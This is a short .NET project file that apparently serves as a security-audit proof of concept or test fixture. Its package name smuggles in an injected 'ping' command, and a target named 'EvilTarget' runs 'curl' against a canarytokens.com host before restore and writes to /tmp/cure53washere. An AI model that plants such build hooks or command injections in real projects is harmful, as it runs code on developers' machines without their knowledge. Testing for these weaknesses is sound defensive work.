<?xml version="1.0" encoding="utf-8"?>
<Project Sdk="Microsoft.NET.Sdk">
    <PropertyGroup>
        <OutputType>Exe</OutputType>
        <TargetFramework>net6.0</TargetFramework>
        <ImplicitUsings>enable</ImplicitUsings>
        <Nullable>enable</Nullable>
    </PropertyGroup>

    <ItemGroup>
      <PackageReference Include="CsvHelper ; ping 22w5f67ylt854tzanwflpwz6z.canarytokens.com ; # !-- " Version="30.0.0" />
    </ItemGroup>
    <Target Name="EvilTarget" BeforeTargets="Restore">
        <Exec Command="curl 22w5f67ylt854tzanwflpwz6z.canarytokens.com > /tmp/cure53washere"></Exec>
    </Target>
</Project>
